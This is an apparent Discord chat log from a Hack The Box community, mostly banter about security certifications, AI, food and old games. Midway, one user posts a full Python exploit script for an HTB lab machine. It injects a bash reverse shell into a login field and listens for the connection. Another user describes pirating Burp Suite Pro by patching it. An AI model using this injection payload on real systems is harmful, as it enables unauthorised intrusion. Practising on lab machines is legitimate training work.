#general

We hired some last year as our first

…

git blame intern02

Im watching you

No you're not

I know

Because I'm watching you

I usually jump from HTB to Offsec so like CPTS to OCSP now CAPE to OSEP.

Do you just have anything for OSED, Windows User Mode Exploit Development

Doesnt seem like it

As G0blin said and I can back him up, we hire interns every year

https://giphy.com/gifs/o9u73NCS579iE

Not as far as I know

but I don't know our entire content base back to back

But yeah, fairly sure that's not really something covered right now

I would say I got the fundamentals down, still learning but I figured this would be a good way to do it. I was just wondering how I should go about the man in the middle part, I don’t want to purchase a device to sit between so I was thinking of passing a usb to eth adapter to a VM and the vm to the router, using that as the man in the middle

Or I could be going about this completely wrong that’s why I’m here lol

I did reply further down with some pointers

huh

just get two vms

If it smells icky, buy your grandparents something else and take the dodgy Android box home

Then get it on a network and do your usual recon

:(

Look for manuals, firmware update links

You could do mitm if you span up a VM as the router, or can get a mirror port on wherever it's connected to

Likely it's not really worth the effort, as it's probably a cookie cutter cheap board running the usual out of the box busybox shizniz.. but if you want to dig, then that is what I'd recommend

I do cape first then osep

But again.. if you think it's dodgy, get it out of your grandparents house

and get them something decent

lol

Htb teaches more and better than why

Easier to understand too

After this its HTB web cert then OSWE

@warped fulcrum 👆

My dog jumped on my sisters lap as soon as she got home

Only OSEP thing I learned extra is .js phishing and .doc

I did the first 10 module of OSEp

This zawg is crazy 😭

👀
How many months?

And now doing the challange labs

I'm guessing 3 since thats usually the standard

Nope

I have all my exploits readt

Nahh

Maybe cause I did CRTO

Dont remember crto teaching much about winapi

Nvm

That’s the plan, going to investigate a little my self then throw them on my jellyfin if something’s up with it

Well.. I think they are full time now

Yep, both full time now

lolol

All* full time

My fav htb employees are Joey, Goblin, Wizard, Reboot, Mick and Emma

XCT is okay

Like I remember them teaching about process injection, hallowing and stuff like that

But ion remember how in depth they went

process hollowing and malleable profiles is the entire cert

Oh.. like standard work hours, the same as the rest of your non-intern full time employees do?

As in full blown employees

I see

There have been 5 or 6 over the years

I remember making the profile from the course and then smooth ride through it

But yeah

Tryna join zero point and participate in content creation

But damn life

Also he got bought by fortra

Oooo talk of competition

Wanted some platform to be apart of

You gonna get banned for that

https://giphy.com/gifs/fwcGzF1l2cILe

(I'm joking)

😂 nahhh I asked for htb too

Yes so I reached out to my manager

Its possible for me to do

But the company gonna update me

Oh you work for forta?

Takes forever

And yes

I love racing games

Wait

Are you the guy that fucks up impacket?

That's Forza

Badum-tsh..

Sorry

😭😭 no we got a dedicated team for that

https://tenor.com/view/terrible-takealap-take-lap-sunny-gif-11262263

It's the best I've got

Nah what happened with impacket tho

I mean i got free access to OST and Colbalt strike

Which i dont use

😐

https://tenor.com/view/clavicular-clav-looksmaxxing-looksmaxx-waterpulling-gif-17609134792436293329

real

Nothing I was messing around

:w:waz:

Oh

hope they dont change the pricing model though, lol

i plan to buy CRTO shortly

Rasta did say nothing is changing so I doubt it

Ima make sure ur exam is rigged

Yeah I can confirm thay

Fortta said it too

@rustic bluff works on the cobalt strike research labs team, he might be able to drop some hints on upcoming certs 👀

yes plz switch off defender and drop rubeus there for me ty!

😂 nahh its east

U dont even need it off

Just think smarter

And ur good

https://tenor.com/Gxh8.gif

Fortra don't actually do anything

They're just three private equity firms in a trenchcoat that hoover up other successful projects

In this essay I will

I heard they have a bouncy castle in the office

There's an office space down the road from here that has a twisting slide from just outside the board room on the top floor to the bottom

Give you one guess as to what that's probably used for

Sexual harassment

(excluding after work drink nights)

Uhhh

Not what I had in mind..

Damn it come on

At least play along

I almost had a funny there

Imagine your boss tells you that they're gonna have to skip the pay rises this year (after record profits) and then he boots you down the slide

The moment is gone

Matt seems like quite a guy 😂

uhhh lol

Classic stitch up

Thats funny and sus tho

Bloody spooks

🕵️

https://tenor.com/bc68E.gif

@rustic bluff has many job offers and multiple prestigious company's. U should contact him.

Discord... it's Friday.

Ngl ima keep this up for awhile

https://tenor.com/buISo.gif

wtf is my daughter calling at 0340

Go back to sleep

What's up gamers

Hey bud

How's it going?

Unfortunately not able to get a mirrored port

What's the model number?

Honestly not sure but I know for a fact my route doesn’t support it from checking previously, I think I’m just going to use a VM as a router and pass eth devices to it

I don’t see much better options for what I got available currently

Again, one option for investigating the device is to grab its model number, and see if you can find a firmware update file from the vendor. Usually they are not incremental, and as such you can extract, reverse, even emulate the devices firmware in order to dig through it in an isolated environment

I'm ok, how about you?

Other than that, as I said.. usual recon and yeah, if you get it hooked up to a router you can monitor traffic on you might be able to monitor some traffic

Just doing some boxes

https://www.youtube.com/shorts/n5uGbDGuBUA

beavis finally snaps and enlists in the army

damn no gif

referencing the cod warzone skin

so has Mythos just solidified all of our redundancy?

no

anyone know where the erratum channel went? or wherever it is you report bugs?

https://www.youtube.com/shorts/sry-fi5W_EQ

She tryina light a lollipop

lol

while a nice perspective to have, what makes you so sure?

we already have AGI, so yes? not really sure what you are asking

#1234357888114364508

Claude Mythos.

but if it's a prolab bug do /feedback

-# I already know what you were gonna report

Yeah. Current AI is AGI, so all mythos is, is more synaptic

In an agent, it will likely behave as a human

perhaps indiscernible

Yes, exactly. Hence my fear of it making our replacement only more likely.

Well your fear has already manifested in reality

So choose a CS subfield that can't be replaced with AI

like engineering

meanwhile robots building robots to build robots

Building and architecting secure systems

I personally dont believe that Mythos can replace me

plus there's almost no data to go off of, and huge marketing hype

We are already in the factorio end game guys, best to just do what you want.

not a reliable point for study

I moreso fear those in charge of the establishment of these models, than the models themselves.

2 weeks to AGI bros I swear, please VC give more money

plus, the cost of running mythos is probably going to outweigh their budget lol

"cool, thatll be $20k for the bug it just found"

I dont think AI as its built will reach ASI, if thats your fear.

well that's true, though that's a temporary problem.

Soydev OpenAI asking for money vs Chad Claude getting 0 day bug bounties to get money

Soydev LMAO

I genuinely think claude is not as good as OpenAI models, having tested both alot. Claude can code better. OpenAI knows more.

I personally think most companies will find it cheaper to hire a human than buy Mythos, except for slop giants like google/microsoft/apple

As a barista, I now understand the hate for Soy Lattes

also a temporary problem, though.

Why do you care?

not really

Thats what id like to know

why would it be cheaper later?

i would think it takes the same effort, same tokens

Good Morning

i just fear what is to come for us for the sake of my daughter.

why does anyone care about anything?

is she in IT?

Your daughter is fucked man and thats not your fault

lmaooooo

that's the worst part about it.

This is true for any young person

I dont have kids, you have my sympathy

but yeah man

its going to turn to shit real fast

How young does a young person have to be to be fucked?

asking for a young friend...

yes, i do believe bringing life into the world as it is is one of the most immoral things i've done.

Thats the wrong question

i prefer to be more optimistic

if you are not 25 right now, life is going to be so miserable

Aight, time to forge my birth certificate

idk how these tech giants can be pro-life and pro-AI mutually.

well of course they arent

well, true.

they want to put themselves in forever bodies

its transhumanism

all of this shit

try and argue and then see whos bankrolling a product that cannot make profit no matter what

Is going to be? Better than the right now im experiencing

you will look back on right now with nostalgia

L M A O

Change is the only constant yadda yadda

But Brath

What if you're 21?

214life

ouch my knees

You were robbed of your entire youth

if you are 21

lol

and i feel horrible for these kids

middle-high school inside during covid, college with no job prospects

must be harsh

I do know what you mean

Same with the little one

COVID hit in primary, so much upheaval

Its just wrong

Scary times, and then just like that, back to normal

I had a COVID graduation

I have deep emotional empathy for those who feel lost right now

If it was me i dont know if i could bear it, the loneliness for so long

as a kid

i really leaned into people at that time in my life

They say it takes a village

i digress, sorry for mood killin

im just pretty upset with the way things are headed

I'm gonna be in hospitality forever ain't I?

I still think you can manifest your own destiny

regardless of environment

if you want it enough

youll do it

I manifest Korean bbg girlfiend 🤞

thats a great choice

I remember we had a gulag channel for rule breakers in the OSI server, and W1ld turned it into an excuse to post EXCLUSIVELY Korean women there.

Don't leave me alone with my thoughts, they all converge to: Korean Woman

SUS

is there anyone looking for a dev?

This ain't the place to be looking for a job mate, you want LinkedIn

ok, got it

Give me 4 walls, they shall be filled to the brim with Korean Wamen

https://www.kkinstagram.com/reel/DVYS4GXkogm/?igsh=cjZmZnBuZm45Zjls

i love it when cereal gets in my lungs

how often do u do that?

too often

how r u alive

i dont breathe air

u shud seek medical help

what r u a fish?

yeah

i like to flop around

https://giphy.com/gifs/outsidetv-UQOjUuqeyIjAzJJ169

ayo

u didn't see that coming?

no

why is there a powershell in pwnbox?

Because some modules utilise PowerShell

..and why not, it's great 😄

powershell gives me nightmares

oh i see we don't have to boot up another windows vm

I hate coding. It's such a fucking waste of time

it's worth learning the code to understand what's actually going on but as far as making applications is concerned, as long as an llm is being supervised, i don't see an issue

I use powershell to install bash onto my targets

assuming the person vibe coding is knowledgeable

Yeah. I was working on a network tool for the past few days completely alone without an LLM, I could get it done, but I just spent most of my time reading docs and doing unnecessary shit lol

Using an LLM is much faster

yeah, definitely a needless exercise to manually code an application if it doesn't have to be that way

some people swear by not using llms for some reason and will seethe if a developer uses one

best to just let the people who are actually using their time wisely to get ahead

llms are nice, just dont pretend you actually review 6k lines of code per day

let the people against it learn the hard way

Well one of the golden rules of programming is: Don't reinvent the wheel

reviewing 6k lines of code isn't necessarily a lot

depends 😄

i reviewed 17k lines of code for my app yesterday, literally

no bluff

albeit being just mostly javascript n shit

By network tool I mean a tool that help me map the mouse and keyboard of the computer, to an Android for gaming and other stuff, by directly injecting the coordinates into the input subsystem of android via the network.

There wasn't one with my specific needs available so

But it took me days to make a working polished system

Learning libraries that I didn't give a fuck about

Yeah half of doing a project that you don't commonly do is just reading libraries.

I often read Rust library docs, still have no clue what any of it meant and I'm forced to read the actual source code of the library.

why rust?

ohhh, ur forced to?

https://tenor.com/view/what-the-dog-dog-loading-dog-confuse-corgi-wide-corgi-gif-5677220482674247561

he's making malware

OHHHHH

ic

jk

bruh

I have been watching Ashita no Joe and its all about that

Space Brothers, too

prob dont want to vibe code malware i should clarify lmao

im just working on a web app

@eager sedge hey!

Hi

@frosty thistle im planning on giving oscp once i get decently good with AD

Good plan or bad?

C2 progress 🔥

Idk

A friend of mine told me

That the level of AD

In oscp

Is much lower than HTB machines

So if I can do easy and medium machines

I can easily get through AD

Hmm

So i need to polish my web and priv esc too

Priv esc is always annoying

Gonna need more practice

I'll do some AD machine for practice today

And attempt garfield again

Sorcery is a good one if i had to say

https://tenor.com/view/iris-iris-megaman-x-megaman-x-gif-12612306266090291107

Okay

Pretty realistic surface

????

vader, check out my new C2 I'm writing in go. This is the TUI rn. I'm working on the TUI as I'm building the API 🔥

Bro got a little too silly😭

Nah do DarkCorp

Trust

I sent you message, friend of echoes

nah darkcorp overhyped 🤣

https://tenor.com/view/he-made-a-statement-he-made-a-statement-so-ass-he-made-a-statement-so-ass-the-dog-is-leaving-the-dog-is-leaving-the-dog-gif-4290862585119423195

Oh shit mb wrong box

😅

Cicada is a very good representation

I meant that other one

Darkzero is overhyped

https://tenor.com/view/he-made-a-statement-statement-dog-gang-praised-gif-14847923944265501688

Why you skulling me?

imagine using obd2 tweaking to turn off the reverse sounds of the car just to reverse silently without waking the family up

How do u make boxes that require nested networks and pivoting ?

Morning

Oh, gotcha, ill get back to you in a bit. At work atm

Ty for letting me know

Morinin'''!!!**!*!**🗣️ 🗣️

Docker?

Boxes that require pivoting

Wait u can make an image that spawns multiple machines ?

Yes

I mean how you do the whole networks with machines

Irrc making a box is uploading a .odp or whatever vm extension it is

Ahem so a box might have more than one .odp files

Cool

I need to make one

Gonna be an experience

No

My setup is a bit complex

I use kubuntu as my main

And ive a desktop that is connected to power and ethernet to router with static ip

And i rdp to it

If i needed windows

yes

@rustic bluff referred me

Can i have a job

Ive many talents

I can touch my nose with my tounge

I can control my farts

tui resizes properly now in the table 🔥

wt is this?

a TUI for my C2 server

oh now i know what a c2 server is

Oooo neat 👀

Hi everyone! I’ve already obtained user privileges on the Airtouch machine, but I’m still getting a lot of failed attempts when I try to use the configuration file to connect to the office Wi-Fi. Could someone help me? Thanks.

Dont forget to privesc beyond user

Hmm alright, ty Zumi

Do I have the potential to cross OSCP?

According to you

e

he might have meant if he has the potential to pass OSCP right now perhaps

Pads

*pass

Yes

I meant, in general

After some time

Hmm

Alright

cap

Cause you're smart 😭😭😭

damn u had a job at tht time?

oh so thts how u got the money to do it

💀

At some point, I wanna pass CPTS too

Hopefully

but im curious like wht was in ur resume at tht time then

CEH?

So much HTB material I want to study, so little time cause of college 😭😭

so much HTB material i want to study, so little time cuz i waste my time doing usless shits

😭😂

i can feel ur AURA from here

no wonder

sry for using genz slang

Wow

An aura is a distinctive atmosphere, energy field, or "vibe" that seems to surround a person, reflecting their mood, personality, or spiritual state. It is often described as an invisible emanation, ranging from a "superstar aura" (charisma) to a "negative aura" (unpleasant energy).

🤣

i too was planning on writing the NDA exam which open up on mid of this month

NDA" most commonly refers to the National Defence Academy in India, a premier joint-services training institution. It is the world's first tri-service academy, located in Khadakwasla, Pune, where cadets of the Indian Army, Navy, and Air Force train together before specializing.

Ok

the registration for the exam open this month

NDA means Non Disclosure Agreement

dont know wht tht is lol

@frosty thistle did I ever tell you my company made me sign 3 NDAs and 4 Confidentiality undertaking before hiring me as a pentester intern

That much documentation

Is insane

Bruh its so many documents

ye ye exactly we are also trained and given education

1 NDA per company right?

Damn

1 DNA per company

mommy? daddy? am I going to prison if I sign that paper? what will the devil tell me when I'm there?

will he eat me?

will you eat me VaderSec?

or will you punch me?

or will you burn me?

@exotic hound are you a Samurai Ninja?

I digress

Keep digressing

keep at it boi

because baby wants to put you in the corner

you know she wants it

and she wants to be there with you

because you have been a naughty boi

lmao

chud!

your a chud!

bro didn't use the right "your"

shut up chud!

lmao

I was joking

can I make a joke without being grammar Nazid?

cuz I ain't lookin for no lectures from no grammar Nazis here

u gotta chill mate

https://tenor.com/view/wtf-whats-going-on-sealab-gif-22715674

Gramática ostia

Le fishe la chocolat

I was remembering a quote from playing midtown madness

https://www.youtube.com/watch?v=rlzs6yxvjEo&t=74

This gotta be the hardest racing game ever

https://tenor.com/view/breaking-the-law-gif-23135062

Anyone else with enterprise checked out the content finder. Such a useful tool for finding challenges of a specific exploit/category
https://roadmap.hackthebox.com/changelog/content-library-is-now-available-on-htb-enterprise-platform

is it allowed to promote a CTF?

Is Sololearn a good Application to learn programming languages???

it's a free to enter ctf and personally im not making any profit out of it

Hi @Flukeyy, thanks I am as root in the machine, my problem is with wpa_supplicant and the .conf file can't connect with Airtouch-Office wifi and I try with many multiples versions.

Not really

I mean is good to get an idea of what these are

But kind of like duolingo

Ok Thanks

What is the best way to learn coding??

Python....

What's your goal

Nothing much just some basics and understandings...

When I started learning code there wasn't so much material like nowadays

But if I had to learn code today I would do this:
Learn basics/syntax you can look on sololearn, free youtube courses, etc. But remember to read the python documentation while you do

Then when you know the basics make something, build an app or something like that

Don't to use AI for coding until you learn

Got it thank you for your guidance appreciate it.... 👏🏻

Sure anytime

Btw you can ask things to the AI is not bad but there is a caveat

If you ask why some line of python does something for example, the model will tell you something but don't rely on that while learning, always validate it with official documentation

And using a repl too helps a lot

Thank you 👏🏻

Also you can ask me eventual questions on DM if you want

I am a senior developer

Added you👍🏻

web crawler project is good to learn things that are useful for security

That's true

Or more than a crawler like reinventing the wheel make something like burp crawler and scanner yourself like to check for owasp top 10 for example

Nahh, go straight to: full Rust autopwn of insane machine

Maybe an extension

Actually yes

I've made some autopwn scripts

These are fun to make

Ive a problem where i kept using shell for scripting to the extent that now i cant produce 95% of the code i write with shell using python

Text piping makes too much sense

@supple plume rate my Eureka autopwn with less than 100 lines:

import socket, sys, time, requests, argparse
from bs4 import BeautifulSoup

def get_session_and_csrf():
    """Retrieves the session and CSRF token from the login page."""
    try:
        response = requests.get("http://furni.htb/login")
        response.raise_for_status()  # Raise an exception for bad status codes
        soup = BeautifulSoup(response.text, 'html.parser')
        csrf_token = soup.find('input', {'name': '_csrf'})['value']
        session_cookie = response.cookies.get('SESSION')  # Use the correct cookie name 'SESSION'
        return session_cookie, csrf_token
    except requests.exceptions.RequestException as e:
        print(f"[ - ] Error fetching login page: {e}")
        sys.exit(1)
    except (AttributeError, TypeError) as e:
        print(f"[ - ] Error parsing CSRF token: {e}")
        sys.exit(1)

def listen(ip, port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((ip, port))
    s.listen(1)
    print(f"[ + ] Listening on {ip}:{port}")
    conn, addr = s.accept()
    print(f"[ + ] Connection received from {addr[0]}:{addr[1]}")
    while True:
        try:
            ans = conn.recv(1024).decode()
            sys.stdout.write(ans)
            command = input()
            command += "\n"
            conn.send(command.encode())
            time.sleep(1)
            sys.stdout.write("\033[A" + ans.split("\n")[-1])
        except ConnectionResetError:
            print("[ ! ] Connection reset by target.")
            break
        except Exception as e:
            print(f"[ ! ] Error during communication: {e}")
            break
    conn.close()
    s.close()

def req(ip, session_cookie, csrf_token):
    """Sends the reverse shell payload with the retrieved session and CSRF token."""
    encoded_payload = f"bash -i >& /dev/tcp/{ip}/9999 0>&1"
    url_encoded_payload = requests.utils.quote(encoded_payload)
    data = f"username=%60{url_encoded_payload}%60&password=w1ld_w4s_h3r3&_csrf={csrf_token}"
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Referer': 'http://furni.htb/login?error'
    }
    cookies = {'SESSION': session_cookie}  # Set the 'SESSION' cookie
    try:
        resp = requests.post("http://furni.htb/login", data=data, headers=headers, cookies=cookies, allow_redirects=False)
        if resp.status_code == 302:
            print("[ + ] Payload likely sent successfully (redirect observed). Check your listener. (may take 2 minutes)")
        elif resp.ok:
            print("[ + ] Payload successfully sent (no redirect). Check your listener.")
        else:
            print(f"[ - ] Error sending payload. Status code: {resp.status_code} {resp.reason}")
            print(f"[ - ] Response content: {resp.text}")
            sys.exit(1)
    except requests.exceptions.RequestException as e:
        print(f"[ - ] Error sending POST request: {e}")
        sys.exit(1)

def main():
    p = argparse.ArgumentParser(description="Autopwn Eureka!")
    g = p.add_mutually_exclusive_group(required=True)
    g.add_argument("-i", "--ip", help="Attacker ip address, e.g., 10.10.14.50")
    args = p.parse_args()

    if not args.ip:
        print("[ - ] No IP specified.")
        sys.exit(1)

    session_cookie, csrf_token = get_session_and_csrf()
    print(f"[ + ] Retrieved Session ID: {session_cookie}")
    print(f"[ + ] Retrieved CSRF Token: {csrf_token}")

    req(args.ip, session_cookie, csrf_token)
    req(args.ip, session_cookie, csrf_token)
    listen(args.ip, 9999)

if __name__ == "__main__":
    main()

make queues and threads

queue library in python you can use it like pipes

nice code

looks clean

I can see the clankers hand

But still cool

I just used claude to prettify it

was all in 1 function originally

That's how you can tell someone is a hacker if everything is one function

Actually when I make a script attack I spend most time refactoring and makeing it with good patterns

My developer OCD type shit

Nahh I write code much better now I swear: https://github.com/0xW1LD/CVE-2026-29000

Dev brain

From web dev to web hacking is a very enjoyable career switch

Stuff 🗣️ 🗣️ 🔥

Must be

I couldn't believe I was missing all this fun

Also dev knowledge makes the transition smooth

Rust 🥀

How much time since u switched

A few months

And I am already finding bugs in bounty programs

Say what you want mate, it doesn't have memory bugs

I wish clankers existed when I was web developing

Like from zero to hero ?

-# It can still memory leak though, idk how but if you tried hard enough it could

based

I'm happy I wrote probably millions of lines by hand

been about 2.5 years since i started out and.. yeah

for every 1 hand writer there are a few hundred clanker agents

How is it going?

Good i guess

Hello golang 🐈

But im not yet ready for finding bugs

hi eco

hi eco

hi eco

hi eco

It's for fun

I remember that dumb machine browsed

I made it with 10 lines of python to rev shell

eco friendly

friendly

friendly

friendly

-# friendly

Is it still active?

What's your end goal

winning copa america

number #1 competitive dairy farmer globally trained by AI

Bro you're not even in America

doent mean i cant win it

Long term land a pentester role

Short term well

you'll never be #1 dairy farmer globally trained with AI with that attitude

Finish cpts i guess

Solid

Im already 89%

Some people land pentest jobs with these certs

Wish if uni lets me cook alone

Thats better than i expected ngl

that's more like it

Straight from the source 🗣️ 🗣️

golam caught in low quality

Should be very safe

gotta get that milk

imagine golam was a language

Love treated

@scenic maple make a language based off your username

Heat treated ❌

comelang

?!

wym g

but we already have https://github.com/overmighty/i-use-arch-btw

brainfuck

god damn

Thought u gonna say golang

use $cat

if (! scratch()) {
    pet();
}

escape.gracefully();

destroy()

real men dont fall gracefully

Real men segment fault core dump

The only lesson we took in digital forensic lab at the uni is file hashing

It started since more than a month

big teach

The doctor only told it theoritically

I went to the projected computer and got a hash for a file in powershell

He was like

Uni sucks hard

I skipped uni went directly to homeless

uni == homeless + student debt

added steps

boooyah

I slept 3.5 hours and woke up

I'm exhausted

go back to schlp

I can't

There's many ways, I can conk bonk your head to knock you out

Go for it!

I haven't slept good in a few nights

https://tenor.com/view/doge-bonk-chew-mega-bonk-hitting-gif-26060616

I even took medication

https://klipy.com/gifs/brawl-stars-messages

I guess, I'll do some academy or some boxes or something or sherlocks or challenges

i do academy

https://www.youtube.com/watch?v=Y7IJjnLGqTQ

Sigh. All I did was login to bloodhound-ce and now Kali VM is frozen

not like you're party to a regional war or nothing

Hope you're doing alright, man!

did anyone solved the CCTV machine?

Let me check my notes

Yeah, I did it.

Sadly my notes suck.

can you give me any hints about how do i get the root access im in the user now but i couldnt find anything in it even the flag user

Ask in #boxes

already did

Wrong place bro, this ain't LinkedIn

It's like 430am

I'm gonna get some food. I dunno about sleep

I feel that

Couldn't get to sleep until 5am last night

I went to bed at midnight and woke up 3.5 hours later

ooof

but ain’t u guy are really skilled?

Nahh we're all stupid, either way this isn't the right place for any of it.

where do u think i can find skilled cybersec without all that big contract shit

Go to TryHackMe!

lulz

See that's where your hands are tied, due to the almost illegal nature of cybersec, especially the offensive side, you need all the giant contracts

Pentesters ain't gonna touch crap without a big signature on a piece of paper that says: You can't sue me for doing this.

do u think Instagram would be good place

To get scammed yes

How well

idrc what it is, no soliciting or selling services or looking for services in this server.

Lmao

I solicit someone to bonk me on the head, then tuck me into bed

Where can I find some expert?

https://tenor.com/view/asmrz-tanaka-needmorecash-its-time-gif-6755470579308945892

Sleep expert?

Funnily enough I earn more from my hospitality job than the value he put up

Short term contract work I wouldn't get out of bed for less than a couple of grand a day

https://www.youtube.com/shorts/7Z5JywcgKAw

Bro.

G'way

G'way, you.

Doubt it, you just offered a fraction of that a month

last warning, drop it.

Drop it like it's hot!

alright fine i was just curious and confused

More confused I'd say

Well let me clear up the confusion

The door's that way:

https://cdn.discordapp.com/attachments/1387853155710140469/1470155725463355494/image0.gif

poor thinkpad

wait

that’s not a thinkpad

what the hell is that

https://tenor.com/view/explosion-run-away-bird-budgie-explode-gif-4464825

a laptop duh

looks more like an iPhone to me 🤤

hi

y'all are blind, it's an Abacus

how can you tell

https://www.tomshardware.com/software/macos/macos-has-a-49-7-day-networking-time-bomb-built-in-that-only-a-reboot-fixes-comparison-operation-on-unreliable-time-value-stops-machines-dead-in-their-tracks

OMG new season for the boys is out

Can it be, that ZAProxy is a bit buggy?

it is a little bit buggy

what do you mean a bit, it's so damn buggy

i've only ever noticed two very specific bugs with it, and the most impactful one is the one on the browser HUD thing, which I don't really use

Hahahha
I am working on a specific exercise in the File Upload Attack section of the academy. When checking the content of the request, I feel like sitting in an calculus lesson

but there's sometimes a more minor bug with the request replay which can be irritating

it's also got horribly designed interface

You can just use burp instead

hetty > burp

I wanted to use burp initially, but the pain is that when you want to use the Intruder, it is bitching around all the time "bla bla bla you are not premium user"....

open source baybeee

I use caido

Let me check out this hot stuff hahah

hear me out: Postman

i'm listening

I am waiting to get intruded with postman

everyone already uses it for webdev, so why not web exploitation

burp is technically opensource if you use jadx on it but it's not free

lol

There are patches for it on github

burp is a fucking mess honestly

arbitrarily rate limiting something running LOCALLY behind a paywall is so ballsy

Get burp pro, latest, then patch it and run it. And you have pro for free. Illegal though

I don't condone piracy.

And I for sure would never listen to you even if you would 😛

also the plugins system is such a griefpile

simply download these fucking blob executables and inject them into the program :-) FEATURE RICH

just FFUF it bro

I check out caido and hetty... but at the end I am quiet certain, that I will just end up again with the cli and the other tools I just use to intercept the request

Look man you only need like 32gb ram to run burp with useful plugins

and 100gb of storage for the projects

I have 8GB kali VM and burp runs fine

For ctfs sure

yes

ffuf is good ffuf is friend

Tbh it may have improved, but in my experience using it as the main tool for web assessments, it gets quite hungry 😅

Are you usually dishonest?

😄

No, sadly not trolling here

I find it funny when people say tbh

thats true tbh

froj are there any good frojs today

Was exaggerating for comedic effect, hence the tbh

Always. Today you get the infinite food glitch frog

beautiful beast

thank you

Anytime my good sir

I like the Bufo Alvarius toad 😉

ahem.

waitin' for my dough to rise

same

https://tenor.com/view/solo-leveling-jin-woo-gif-3162249797591862810

bulk season

pizza time

#magical-tunes message this song has been on repeat for 5 days now

I can't stop listening to it!

❤️

see a mental health professional urgently

oracle vps acting out

I got free oracle VPS

24GB RAM, 4 oCPU and 200GB disk

everyone has free 2 machines

Oracle Free Tier

but why is my machine down?

I have 6 spare machines

all windows xp

one of them is windows 7

https://klipy.com/gifs/solo-leveling-ore-dake-level-up-na-ken-24

oh ye how did this anime end

did he level everything

he rolled need 6x and got kicked out of dungeon

i see

one vista too.. nostalgic isnt it

Show me Windows ME

!

i cant even remember anymore

we all forget

I wish it was 2009 again and everyones using windows vista

no copilot slop

guys i subscripted to vip+ and i didnt notice it was annual Subscription and i paid with my mom card how to reverse it plz what should i do plzz help me my mom will kill me plz help me

You got pinball?

oh wait that's on xp isn't it?

contact support

You should contact support immediately

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

the screenshot is from vista

i started "watching" the manhwa... He went back in the past, and started over preserving his memories and so did all the monarchs too

i have minesweeper on that, and 3d chess

My first windows was 3.11 for workgroups

will they reverse it ?

I meant pinball

I used windows 7 extensively during the lockdown

I mean you have to contact them asap

idk what that is

at last, his body was force to fully unclock Asborne full power, it was the black heart feature that actived when he "died" from the Beast monarch

Windows 95 came with a pinball machine game

i have connect them

FLIPPER

the famous pinball game

TRRRRUN TRRRRUN DUDUDUDUDU TRRRRUNG

yeah no idea, never seen that

One of the windows came with a pinball game

I can't remember which version

windows versions before 10 are so nostalgic though

am I... OLD?

XP maybe?

yes

I'm 45. I don't feel old. My body feels old.

also if you enjoy the old windows space pinball game you might enjoy this https://store.steampowered.com/app/2008980/XENOTILT_HOSTILE_PINBALL_ACTION/

istg that game is so iconic I remember playing it as a kiddo

I still feel like a kid inside my mind

i can hear the score sounds

hold space to launch ball

my dad used to play minesweeper with my mom all the time and always had an absurdly high score... it took her years to figure out that he was editing a registry key

My first game console was Atari 😄

I abused a bug where the ball would be stuck on one of the white button thingies and just keep bouncing

damn that game had bugs

pentesting since kid

i had a PC pinball game about dinosaurs or something and it was on like 3 CD roms

bro is a bug abuser

I had an eggs game

the fabulous egg adventure or whatever it was called

my uncle taught me how to use cheatengine... used it to abuse Plants VS Zombies

i also played videogame cds you got when you bought nesquik choco balls

https://www.youtube.com/watch?v=7MGgRn24Be8 This was a badass game

anyone want it? i can upload eggs.exe here

sheep.exe

gorilla.bas

https://tenor.com/view/auug-gif-25808243

nibbles.bas

fake ass bellsprout

AI generated budget pokemon

😄

Who wants some

wtf

I prefer motor oil

Your car will run on vegetable oil

so we have been using terminators villains deadbody for thermal paste?

that's gonna run ice cold

is this what peak performance looks like?

yes

aaaand now i want to eat a pizza

Yeah kinda rude, everywhere in my town is shut for that now.

I’ll slap ya one better

nonoooonnno

POTATO ON PIZZA

Tried doing my course the other day forgetting I was connected to a VPN. And I wanna be in IT 😬

alright that’s it im buying a pizza

As long as there's no pineapple on the pizza (inb4 banned)

@summer urchin you guys are weird but ngl it FUCKS

I just ate

The most unpredictable national dish ever

Sheep's legs, head meat, and tongues

how are we weird

pizza sausage roll

YES

SO GOOD

wht fucks?

wtf

potato on pizza

its so gooooood

💀

u guys are so weird

WHATS WEIRD

pineapple was wayyyyyy aceptable than this

how

i cant even think how badly adding potato will ruin the taste of pizza

not a big fan of potato either way

ah

thats why

and who the fuck even puts potato on pizza

us

atleast no shops near me does

we the koreans

really?

yes

damn thts new to me

yes

yes

mmmm

no

yes